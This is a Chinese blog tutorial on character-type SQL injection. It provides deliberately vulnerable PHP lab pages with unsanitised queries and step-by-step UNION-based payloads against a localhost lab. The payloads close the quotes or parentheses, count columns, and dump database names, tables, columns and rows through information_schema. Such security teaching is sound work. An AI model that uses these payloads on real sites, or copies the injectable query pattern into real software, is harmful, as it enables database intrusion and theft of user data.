SQL注入原理-字符型注入

你们de4月天

已于 2023-03-25 19:53:25 修改

阅读量1.1w

点赞数 33

分类专栏： SQL注入文章标签： sql 数据库网络安全

于 2022-09-13 22:58:40 首次发布

本文链接：https://blog.csdn.net/weixin_52635170/article/details/126810746

版权

SQL注入专栏收录该内容

15 篇文章

订阅专栏

小伙伴们大家好！本期为大家带来的是SQL注入原理-字符型注入的讲解！

4、查看当前数据库、数据库用户以及数据库版本

SQL注入原理

SQL注入的原理是由于后端没有对前端用户输入的数据进行检验与过滤，导致用户输入的SQL语句传入到后端，被后端执行。

字符型注入

所谓字符型注入就是用户在前端输入的参数值传入到后端，后端的SQL查询语句将参数值用引号或者括号等特殊符号包裹了起来。

例如：

select * from users where username='admin'

这里的admin就被单引号包裹了起来。

下面我们就进入字符型注入的学习。

一、单引号字符注入

源代码：

<?php

    // 连接数据库
    $coon = mysqli_connect("127.0.0.1","root","root","test",3306);
    error_reporting(0);

    if (isset($_GET['id'])) {
        // 接受传来的参数id
        $id = @$_GET['id'];
        // 执行的SQL语句
        $sql = "select id,username,password,phone,e_mail from guests where id='$id' limit 0,1";
        $res = mysqli_query($coon, $sql);
        $row = mysqli_fetch_array($res);

        if ($res) {

            echo "<center>";
            echo "<h1>"."username:".$row['username']."</h1>"."<br/>";
            echo "<h1>"."password:".$row['password']."</h1>"."<br/>";
            echo "<h1>"."phone:".$row['phone']."</h1>"."<br/>";
            echo "<h1>"."e-mail:".$row['e_mail']."</h1>"."<br/>";
            echo "</center>";
        }else{
            echo "<center></br>";
            echo "<h1>";
            print_r(mysqli_error($coon));
            echo "</h1></center>";
        }
    } else {
        echo "<center><br/>";
        echo "<h1>Please input a value as id!</h1>";
        echo "</center>";
    }

1.测试是否存在注入点

我们直接传入id值“?id=1”。

我们输入“?id=1 and 1=2”来检测and 1=2 的条件是否能被数据库执行。

发现数据依然能够正常回显，这是因为我们传入的id值是被单引号包裹了起来。后端的查询语句的条件被改成“where id='1 and 1=2'” ，而MySQL是一种弱类型的语言，会把'1 and 1=2'这条字符串的数值当作字符串前边的1，所以查询输出的数据依旧是id值为1 的数据。

这个时候我们就要闭合单引号，我们在id值后边加一个单引号试一下，构造id值“?id=1'”。

发现报错，这是因为1'被插入SQL语句中，由于后面多了个单引号使得语句报错。

要怎么解决这个问题呢？

我们可以采用注释掉后面的一个单引号就可以。

构造id值“?id=1'--+”，"--+"代表注释，另外SQL语句还有其他的注释符号“#”。

http://127.0.0.1/opsql/sql04.php?id=1'--+

成功回显了id=1的数据。

下面我们再尝试构造“?id=1' and 1=2--+”，观察页面是否正常回显。

http://127.0.0.1/opsql/sql04.php?id=1' and 1=2--+

由于1=2的条件是错误的，页面没有回显id值为1的数据，所以and 1=2这条语句成功的被后端执行。

再构造“?id=1' and 1=1--+”看页面是否能回显id值为1的数据。

http://127.0.0.1/opsql/sql04.php?id=1' and 1=1--+

正常显示了id值为1 的数据，说明存在注入点。

2、判断字段个数

接下来，我们就是来判断后端在数据库查询时，总共查询了几个字段的数据。

我们通常使用order by 来判断后端进行数据库查询时所查询的字段数。

我们直接构造id值为“?id=1' order by 5--+”

http://127.0.0.1/opsql/sql04.php?id=1' order by 5--+

order by是数据库查询的时候对结果进行的排序，如果后面写的是字段，则根据查询字段进行排序，但如果后面写的是数字，该数字大于所查询的字段数，则就会报错，小于的话就不会报错。

order by 5的时候正常显示了id值为1 的数据，而order by 6的时候报错“Unknown column '4' in 'order clause'”。说明后端SQL查询语句查询的字段数为5个，返回上面查看源代码查询的字段数确实是5个。

3、找出可以回显的字段

构造id值“?id=1' union select 1,2,3,4,5--+”

http://127.0.0.1/opsql/sql04.php?id=1' union select 1,2,3,4,5--+

发现没有显示1，2，3...。这是为什么呢？因为后端正常查询了id=1的数据并且前端只显示一条数据的信息。想要得到1，2，3...分别能在哪里显示，就必须让后端的查询语句查不到结果，即：让id值为负或者在id=1'后添加一个条件“and 1=2”。

这里可以查询的字段，第二个第三个第四个第五个字段都能在前端页面显示。

4、查看当前数据库、数据库用户以及数据库版本

构造id值“?id=-1' union select 1,database(),user(),version(),5--+”

http://127.0.0.1/opsql/sql04.php?id=-1' union select 1,database(),user(),version(),5--+

MySQL中database()为查看当前数据库的函数， user()为查看当前数据库用户名的函数，version()为查看数据库版本信息的函数。

从页面回显结果可以得到当前数据库名为test，当前数据库用户名为root@localhost，数据库的版本为5.5.53。

5、查看所有的数据名

构造id值为“?id=-1' union select 1,2,group_concat(schema_name),4,5 from information_schema.schemata--+”

http://127.0.0.1/opsql/sql04.php?id=-1' union select 1,2,group_concat(schema_name),4,5 from information_schema.schemata--+

因为前端只显示一条数据，而我们想要得到所有的结果就要使用group_concat()函数，group_concat() 可以将我们查询到的数据用“,”拼接起来。

information_schema数据库是MySQL5.0之后自带的数据库，infomation_schema数据下的schemata表存储了所有数据库名，information_schema数据库下的tables表存储了所有的表名，information_schema数据库下的columns表存储了所有的字段名。

6、查看数据库下的所有表名

构造id值“?id=-1' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='study'--+”。

http://127.0.0.1/opsql/sql04.php?id=-1' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='study'--+

7、查询表中的所有字段

构造id值“?id=-1' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='study' and table_name='student'--+”

http://127.0.0.1/opsql/sql04.php?id=-1' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='study' and table_name='student'--+

8、查询表中的数据

构造id值“?id=-1' union select 1,2,group_concat(id),group_concat(name),group_concat(age) from study.student--+”

http://127.0.0.1/opsql/sql04.php?id=-1' union select 1,2,group_concat(id),group_concat(name),group_concat(age) from study.student--+

二、双引号字符注入

源代码：

<?php

    // 连接数据库
    $coon = mysqli_connect("127.0.0.1","root","root","test",3306);
    error_reporting(0);

    if (isset($_GET['id'])) {
        // 接受传来的参数id
        $id = @$_GET['id'];
        // 执行的SQL语句
        $sql = "select id,username,password,phone,e_mail from guests where id=\"$id\"limit 0,1";
        $res = mysqli_query($coon, $sql);
        $row = mysqli_fetch_array($res);

        if ($res) {

            echo "<center>";
            echo "<h1>"."username:".$row['username']."</h1>"."<br/>";
            echo "<h1>"."password:".$row['password']."</h1>"."<br/>";
            echo "<h1>"."phone:".$row['phone']."</h1>"."<br/>";
            echo "<h1>"."e-mail:".$row['e_mail']."</h1>"."<br/>";
            echo "</center>";
        }else{
            echo "<center></br>";
            echo "<h1>";
            print_r(mysqli_error($coon));
            echo "</h1></center>";
        }
    } else {
        echo "<center><br/>";
        echo "<h1>Please input a value as id!</h1>";
        echo "</center>";
    }

咱们还是构造id值“?id=1" and 1=2--+”，注意这里咱们在id=1后加的是双引号了，而不是单引号。

来看一下页面回显的情况，如果能够回显id值为1的数据，代表不能注入或者包裹id符号不是双引号；如果不能够回显id值为1的数据，代表and 1=2 条件被传入到后端数据库查询语句，导致后端没有查询到结果，以至于前端没有回显数据，则存在注入点。

and 1=2 时页面没有回显id值为1的数据，而and 1=1时页面正常回显了id值为1的数据，所以存在注入点。

接下来就是判断后端查询的字段个数，找出前端页面可以回显的字段，爆出数据库名、表名、字段名，爆出字段名后就可以查看数据了。具体操作跟单引号字符注入的步骤一样，这里就不赘述了。

三、小括号字符注入

源代码：

<?php

    // 连接数据库
    $coon = mysqli_connect("127.0.0.1","root","root","test",3306);
    error_reporting(0);

    if (isset($_GET['id'])) {
        // 接受传来的参数id
        $id = @$_GET['id'];
        // 执行的SQL语句
        $sql = "select id,username,password,phone,e_mail from guests where id=($id) limit 0,1";
        $res = mysqli_query($coon, $sql);
        $row = mysqli_fetch_array($res);

        if ($res) {

            echo "<center>";
            echo "<h1>"."username:".$row['username']."</h1>"."<br/>";
            echo "<h1>"."password:".$row['password']."</h1>"."<br/>";
            echo "<h1>"."phone:".$row['phone']."</h1>"."<br/>";
            echo "<h1>"."e-mail:".$row['e_mail']."</h1>"."<br/>";
            echo "</center>";
        }else{
            echo "<center></br>";
            echo "<h1>";
            print_r(mysqli_error($coon));
            echo "</h1></center>";
        }
    } else {
        echo "<center><br/>";
        echo "<h1>Please input a value as id!</h1>";
        echo "</center>";
    }

首先咱们先构造id值“?id=1'”，直接先在id=1后加一个单引号，观察页面回显。

通过报错信息猜测id值可能被小括号包裹或者被单引号+小括号包裹。

我们假定id值只被小括号包裹，构造id值“?id=1) and 1=2--+”，这里id=1后就变成了小括号了。

来看一下页面回显的情况，如果能够回显id值为1的数据，代表不能注入或者包裹id符号不是小括号；如果不能够回显id值为1的数据，代表and 1=2 条件被传入到后端数据库查询语句，导致后端没有查询到结果，以至于前端没有回显数据，则存在注入点。

and 1=2 时页面没有回显出id值为1的数据，and 1=1时页面正常的回显了id值为1的数据，说明id值是只被小括号包裹的，存在注入点。

接下来的操作就跟前面的单引号双引号字符注入的操作一样了，这里就不赘述了。

四、单引号+小括号的字符注入

源代码：

<?php

    // 连接数据库
    $coon = mysqli_connect("127.0.0.1","root","root","test",3306);
    error_reporting(0);

    if (isset($_GET['id'])) {
        // 接受传来的参数id
        $id = @$_GET['id'];
        // 执行的SQL语句
        $sql = "select id,username,password,phone,e_mail from guests where id=('$id') limit 0,1";
        $res = mysqli_query($coon, $sql);
        $row = mysqli_fetch_array($res);

        if ($res) {

            echo "<center>";
            echo "<h1>"."username:".$row['username']."</h1>"."<br/>";
            echo "<h1>"."password:".$row['password']."</h1>"."<br/>";
            echo "<h1>"."phone:".$row['phone']."</h1>"."<br/>";
            echo "<h1>"."e-mail:".$row['e_mail']."</h1>"."<br/>";
            echo "</center>";
        }else{
            echo "<center></br>";
            echo "<h1>";
            print_r(mysqli_error($coon));
            echo "</h1></center>";
        }
    } else {
        echo "<center><br/>";
        echo "<h1>Please input a value as id!</h1>";
        echo "</center>";
    }

这里还是先判断是否存在注入点。

这里我们先构造id值“?id=1'”，直接在id=1后先加一个单引号看是否会发生什么。

查看页面回显

通过报错信息可以得知，id值是被单引号+小括号包裹的。

再来构造id值“?id=1') and 1=2--+”，这里id=1后就变成了单引号+小括号。

构造“?id=1') and 1=1--+”

and 1=1时正常回显，and 1=2没有正常回显，代表and 1=2 跟and 1=1 被查插入到了后端SQL语句，存在注入点。

接下来的操作还是跟之前的单引号字符注入的操作一样，这里不再赘述。

五、双引号+小括号字符注入

源代码：

<?php

    // 连接数据库
    $coon = mysqli_connect("127.0.0.1","root","root","test",3306);
    error_reporting(0);

    if (isset($_GET['id'])) {
        // 接受传来的参数id
        $id = @$_GET['id'];
        // 执行的SQL语句
        $sql = "select id,username,password,phone,e_mail from guests where id=(\"$id\") limit 0,1";
        $res = mysqli_query($coon, $sql);
        $row = mysqli_fetch_array($res);

        if ($res) {

            echo "<center>";
            echo "<h1>"."username:".$row['username']."</h1>"."<br/>";
            echo "<h1>"."password:".$row['password']."</h1>"."<br/>";
            echo "<h1>"."phone:".$row['phone']."</h1>"."<br/>";
            echo "<h1>"."e-mail:".$row['e_mail']."</h1>"."<br/>";
            echo "</center>";
        }else{
            echo "<center></br>";
            echo "<h1>";
            print_r(mysqli_error($coon));
            echo "</h1></center>";
        }
    } else {
        echo "<center><br/>";
        echo "<h1>Please input a value as id!</h1>";
        echo "</center>";
    }

这里我们还是先在构造id值“?id=1'”，先在id=1后加入单引号。

页面没有反应，再把单引号改成双引号试一下。

构造id值“?id=1"”

接下来就可以构造id值“?id=1") and 1=2--+” 和 “?id=1") and 1=1--+”来观察页面是否能够正常回显id值为1的数据了。

and 1=2 时页面没有回显出id值为1的数据，and 1=1时页面正常的回显了id值为1的数据，说明存在注入点。

总结

字符型注入的基本流程：

首先判断参数值是被什么符号包裹的，一般先在参数值后边加一个单引号，单引号报错的话可以根据报错信息得到参数被什么符号包裹的；如果单引号不行的话就使用双引号来测试。找到注入点之后，就先判断后端SQL查询语句查询的字段个数，再检测哪些字段可以被前端页面显示，接下来就可以爆出数据库名、表名、以及字段名了，爆出字段名之后就是最后的爆数据了。